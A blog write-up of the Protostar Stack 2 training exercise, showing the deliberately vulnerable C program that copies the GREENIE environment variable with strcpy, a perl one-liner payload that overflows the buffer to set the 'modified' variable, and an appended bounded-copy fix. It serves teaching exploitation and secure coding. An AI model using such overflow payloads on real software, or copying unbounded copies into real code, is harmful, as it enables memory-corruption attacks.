MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Protostar Stack 2


This challenge is pretty much the same as the previous challenge, except that the buffer comes from an environment variable.

#include <err.h>     /* errx() */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];
    char *variable;

    /* The input comes from the environment instead of argv or stdin. */
    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;

    /* Unbounded copy: a value longer than 63 bytes writes past buffer. */
    strcpy(buffer, variable);

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }

}

This problem can simply be solved by running these commands:

user@protostar:/opt/protostar/bin$ GREENIE=`perl -e 'print "A"x64 . "\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ export GREENIE
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable

This puts 64 “A”s followed by 0x0d0a0d0a (in little-endian byte order) into an environment variable. When the vulnerable C app reads it, strcpy overflows the buffer into the “modified” variable, just as in the previous challenges.
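For comparison, here is a bounded version of the copy, added as an example and not taken from the original post or the Protostar source. It rejects any GREENIE value that does not fit in the 64-byte buffer, and `le32` shows why the bytes `0a 0d 0a 0d` read back as 0x0d0a0d0a. The names `le32`, `copy_env_bounded` and `sample_value` are hypothetical, and the sample value is constructed from the command shown above.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64 /* same size as buffer[] in stack2 */

/* Decode four bytes as a little-endian 32-bit value (x86 byte order). */
static uint32_t le32(const unsigned char *p)
{
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Bounded replacement for strcpy(): 0 on success, -1 if src is NULL or too long. */
static int copy_env_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0'; /* dst is an empty string on every failure path */
    if (src == NULL)
        return -1;
    for (len = 0; len < dst_size && src[len] != '\0'; len++)
        ; /* never reads more than dst_size bytes of src */
    if (len == dst_size)
        return -1; /* no room for the NUL: reject instead of truncating */
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed sample: the 68-byte value from the post (64 'A's + 4 bytes). */
static const char *sample_value(void)
{
    static char v[BUF_SIZE + 5];
    memset(v, 'A', BUF_SIZE);
    memcpy(v + BUF_SIZE, "\x0a\x0d\x0a\x0d", 5);
    return v;
}

int main(void)
{
    char buffer[BUF_SIZE];
    const char *env = getenv("GREENIE");
    int rc = copy_env_bounded(buffer, sizeof buffer, env ? env : sample_value());
    printf("sample tail decodes to 0x%08x, copy %s\n",
           (unsigned)le32((const unsigned char *)sample_value() + BUF_SIZE),
           rc == 0 ? "ok" : "rejected");
    return 0;
}
```

With the 68-byte value the copy is refused and nothing is written beyond `buffer`, so `modified` in the original program would stay 0.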
